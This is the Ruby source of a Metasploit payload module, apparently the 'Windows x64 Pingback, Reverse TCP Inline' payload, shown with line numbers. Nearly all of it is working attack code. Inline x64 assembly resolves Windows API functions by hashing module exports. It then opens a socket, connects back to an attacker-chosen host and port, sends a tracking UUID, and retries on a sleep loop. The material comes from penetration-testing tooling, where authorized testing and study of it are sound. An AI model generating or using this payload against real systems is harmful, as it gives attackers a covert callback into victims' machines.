1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
module MetasploitModule
7
  CachedSize = 425
8

9
  include Msf::Payload::Windows
10
  include Msf::Payload::Single
11
  include Msf::Payload::Pingback
12
  include Msf::Payload::Pingback::Options
13
  include Msf::Payload::Windows::BlockApi_x64
14
  include Msf::Payload::Windows::Exitfunk_x64
15

16
  def initialize(info = {})
17
    super(
18
      merge_info(
19
        info,
20
        'Name' => 'Windows x64 Pingback, Reverse TCP Inline',
21
        'Description' => 'Connect back to attacker and report UUID (Windows x64)',
22
        'Author' => [ 'bwatters-r7' ],
23
        'License' => MSF_LICENSE,
24
        'Platform' => 'win',
25
        'Arch' => ARCH_X64,
26
        'Handler' => Msf::Handler::ReverseTcp,
27
        'Session' => Msf::Sessions::Pingback
28
      )
29
    )
30
  end
31

32
  def required_space
33
    # Start with our cached default generated size
34
    space = cached_size
35

36
    # EXITFUNK 'seh' is the worst case, that adds 15 bytes
37
    space += 15
38

39
    space
40
  end
41

42
  def generate(_opts = {})
43
    # 22 -> "0x00,0x16"
44
    # 4444 -> "0x11,0x5c"
45
    encoded_port = [datastore['LPORT'].to_i, 2].pack('vn').unpack('N').first
46
    encoded_host = Rex::Socket.addr_aton(datastore['LHOST'] || '127.127.127.127').unpack('V').first
47
    encoded_host_port = format('0x%<encoded_host>.8x%<encoded_port>.8x', { encoded_host: encoded_host, encoded_port: encoded_port })
48
    retry_count = [datastore['ReverseConnectRetries'].to_i, 1].max
49
    pingback_count = datastore['PingbackRetries']
50
    pingback_sleep = datastore['PingbackSleep']
51
    self.pingback_uuid ||= generate_pingback_uuid
52
    uuid_as_db = '0x' + self.pingback_uuid.chars.each_slice(2).map(&:join).join(',0x')
53
    conf = { exitfunk: datastore['EXITFUNC'] }
54

55
    asm = %^
56
        cld                     ; Clear the direction flag.
57
        and rsp, ~0xF           ;  Ensure RSP is 16 byte aligned
58
        call start              ; Call start, this pushes the address of 'api_call' onto the stack.
59

60
        api_call:
61
          push r9                  ; Save the 4th parameter
62
          push r8                  ; Save the 3rd parameter
63
          push rdx                 ; Save the 2nd parameter
64
          push rcx                 ; Save the 1st parameter
65
          push rsi                 ; Save RSI
66
          xor rdx, rdx             ; Zero rdx
67
          mov rdx, [gs:rdx+96]     ; Get a pointer to the PEB
68
          mov rdx, [rdx+24]        ; Get PEB->Ldr
69
          mov rdx, [rdx+32]        ; Get the first module from the InMemoryOrder module list
70
        next_mod:                  ;
71
          mov rsi, [rdx+80]        ; Get pointer to modules name (unicode string)
72
          movzx rcx, word [rdx+74] ; Set rcx to the length we want to check
73
          xor r9, r9               ; Clear r9 which will store the hash of the module name
74
        loop_modname:              ;
75
          xor rax, rax             ; Clear rax
76
          lodsb                    ; Read in the next byte of the name
77
          cmp al, 'a'              ; Some versions of Windows use lower case module names
78
          jl not_lowercase         ;
79
          sub al, 0x20             ; If so normalise to uppercase
80
        not_lowercase:             ;
81
          ror r9d, 13              ; Rotate right our hash value
82
          add r9d, eax             ; Add the next byte of the name
83
          loop loop_modname        ; Loop until we have read enough
84
          ; We now have the module hash computed
85
          push rdx                 ; Save the current position in the module list for later
86
          push r9                  ; Save the current module hash for later
87
          ; Proceed to iterate the export address table,
88
          mov rdx, [rdx+32]        ; Get this modules base address
89
          mov eax, dword [rdx+60]  ; Get PE header
90
          add rax, rdx             ; Add the modules base address
91
          cmp word [rax+24], 0x020B ; is this module actually a PE64 executable?
92
          ; this test case covers when running on wow64 but in a native x64 context via nativex64.asm and
93
          ; their may be a PE32 module present in the PEB's module list, (typically the main module).
94
          ; as we are using the win64 PEB ([gs:96]) we wont see the wow64 modules present in the win32 PEB ([fs:48])
95
          jne get_next_mod1         ; if not, proceed to the next module
96
          mov eax, dword [rax+136] ; Get export tables RVA
97
          test rax, rax            ; Test if no export address table is present
98
          jz get_next_mod1         ; If no EAT present, process the next module
99
          add rax, rdx             ; Add the modules base address
100
          push rax                 ; Save the current modules EAT
101
          mov ecx, dword [rax+24]  ; Get the number of function names
102
          mov r8d, dword [rax+32]  ; Get the rva of the function names
103
          add r8, rdx              ; Add the modules base address
104
          ; Computing the module hash + function hash
105
        get_next_func:             ;
106
          jrcxz get_next_mod       ; When we reach the start of the EAT (we search backwards), process the next module
107
          dec rcx                  ; Decrement the function name counter
108
          mov esi, dword [r8+rcx*4]; Get rva of next module name
109
          add rsi, rdx             ; Add the modules base address
110
          xor r9, r9               ; Clear r9 which will store the hash of the function name
111
          ; And compare it to the one we want
112
        loop_funcname:             ;
113
          xor rax, rax             ; Clear rax
114
          lodsb                    ; Read in the next byte of the ASCII function name
115
          ror r9d, 13              ; Rotate right our hash value
116
          add r9d, eax             ; Add the next byte of the name
117
          cmp al, ah               ; Compare AL (the next byte from the name) to AH (null)
118
          jne loop_funcname        ; If we have not reached the null terminator, continue
119
          add r9, [rsp+8]          ; Add the current module hash to the function hash
120
          cmp r9d, r10d            ; Compare the hash to the one we are searchnig for
121
          jnz get_next_func        ; Go compute the next function hash if we have not found it
122
          ; If found, fix up stack, call the function and then value else compute the next one...
123
          pop rax                  ; Restore the current modules EAT
124
          mov r8d, dword [rax+36]  ; Get the ordinal table rva
125
          add r8, rdx              ; Add the modules base address
126
          mov cx, [r8+2*rcx]       ; Get the desired functions ordinal
127
          mov r8d, dword [rax+28]  ; Get the function addresses table rva
128
          add r8, rdx              ; Add the modules base address
129
          mov eax, dword [r8+4*rcx]; Get the desired functions RVA
130
          add rax, rdx             ; Add the modules base address to get the functions actual VA
131
          ; We now fix up the stack and perform the call to the drsired function...
132
        finish:
133
          pop r8                   ; Clear off the current modules hash
134
          pop r8                   ; Clear off the current position in the module list
135
          pop rsi                  ; Restore RSI
136
          pop rcx                  ; Restore the 1st parameter
137
          pop rdx                  ; Restore the 2nd parameter
138
          pop r8                   ; Restore the 3rd parameter
139
          pop r9                   ; Restore the 4th parameter
140
          pop r10                  ; pop off the return address
141
          sub rsp, 32              ; reserve space for the four register params (4 * sizeof(QWORD) = 32)
142
                                   ; It is the callers responsibility to restore RSP if need be (or alloc more space or align RSP).
143
          push r10                 ; push back the return address
144
          jmp rax                  ; Jump into the required function
145
          ; We now automagically return to the correct caller...
146
        get_next_mod:              ;
147
          pop rax                  ; Pop off the current (now the previous) modules EAT
148
        get_next_mod1:             ;
149
          pop r9                   ; Pop off the current (now the previous) modules hash
150
          pop rdx                  ; Restore our position in the module list
151
          mov rdx, [rdx]           ; Get the next module
152
          jmp next_mod             ; Process this module
153

154
        start:
155
          pop rbp               ; block API pointer
156

157
        reverse_tcp:
158
        ; setup the structures we need on the stack...
159
          mov r14, 'ws2_32'
160
          push r14                ; Push the bytes 'ws2_32',0,0 onto the stack.
161
          mov r14, rsp            ; save pointer to the "ws2_32" string for LoadLibraryA call.
162
          sub rsp, #{408 + 8}     ; alloc sizeof( struct WSAData ) bytes for the WSAData
163
                                  ; structure (+8 for alignment)
164
          mov r13, rsp            ; save pointer to the WSAData structure for WSAStartup call.
165
          mov r12, #{encoded_host_port}
166
          push r12                ; host, family AF_INET and port
167
          mov r12, rsp            ; save pointer to sockaddr struct for connect call
168

169
        ; perform the call to LoadLibraryA...
170
          mov rcx, r14            ; set the param for the library to load
171
          mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
172
          call rbp                ; LoadLibraryA( "ws2_32" )
173

174
        ; perform the call to WSAStartup...
175
          mov rdx, r13            ; second param is a pointer to this struct
176
          push 0x0101             ;
177
          pop rcx                 ; set the param for the version requested
178
          mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'WSAStartup')}
179
          call rbp                ; WSAStartup( 0x0101, &WSAData );
180

181
        ; stick the retry count on the stack and store it
182
          push #{retry_count}     ; retry counter
183
          pop r14
184
          push #{pingback_count}
185
          pop r15
186

187
        create_socket:
188
        ; perform the call to WSASocketA...
189
          push rax                ; if we succeed, rax will be zero, push zero for the flags param.
190
          push rax                ; push null for reserved parameter
191
          xor r9, r9              ; we do not specify a WSAPROTOCOL_INFO structure
192
          xor r8, r8              ; we do not specify a protocol
193
          inc rax                 ;
194
          mov rdx, rax            ; push SOCK_STREAM
195
          inc rax                 ;
196
          mov rcx, rax            ; push AF_INET
197
          mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')}
198
          call rbp                ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 );
199
          mov rdi, rax            ; save the socket for later
200

201
        try_connect:
202
        ; perform the call to connect...
203
          push 16                 ; length of the sockaddr struct
204
          pop r8                  ; pop off the third param
205
          mov rdx, r12            ; set second param to pointer to sockaddr struct
206
          mov rcx, rdi            ; the socket
207
          mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'connect')}
208
          call rbp                ; connect( s, &sockaddr, 16 );
209

210
          test eax, eax           ; non-zero means failure
211
          jz connected
212

213
        handle_connect_failure:
214
          dec r14                 ; decrement the retry count
215
          jnz try_connect
216
          dec r15
217
          jmp close_socket
218

219
        failure:
220
          call exitfunk
221

222
        ; this label is required so that reconnect attempts include
223
        ; the UUID stuff if required.
224
        connected:
225

226
        send_pingback:
227
          xor r9, r9              ; flags
228
          push #{uuid_as_db.split(',').length} ; length of the PINGBACK UUID
229
          pop r8
230
          call get_pingback_address  ; put uuid buffer on the stack
231
          db #{uuid_as_db}  ; PINGBACK_UUID
232

233
        get_pingback_address:
234
          pop rdx                ; PINGBACK UUID address
235
          mov rcx, rdi           ; Socket handle
236
          mov r10, #{Rex::Text.block_api_hash('ws2_32.dll', 'send')}
237
          call rbp               ; call send
238

239
        close_socket:
240
          mov rcx, rdi           ; Socket handle
241
          mov r10, #{Rex::Text.block_api_hash('ws2_32.dll', 'closesocket')}
242
          call rbp               ; call closesocket
243
        ^
244
    if pingback_count > 0
245
      asm << %^
246
          sleep:
247
            test r15, r15         ; check pingback retry counter
248
            jz exitfunk           ; bail if we are at 0
249
            dec r15               ;decrement the pingback retry counter
250
            push #{pingback_sleep * 1000}            ; 10 seconds
251
            pop rcx               ; set the sleep function parameter
252
            mov r10, #{Rex::Text.block_api_hash('kernel32.dll', 'Sleep')}
253
            call rbp              ; Sleep()
254
            jmp create_socket     ; repeat callback
255
        ^
256
    end
257
    if conf[:exitfunk]
258
      asm << asm_exitfunk(conf)
259
    end
260
    Metasm::Shellcode.assemble(Metasm::X64.new, asm).encode_string
261
  end
262
end
263

264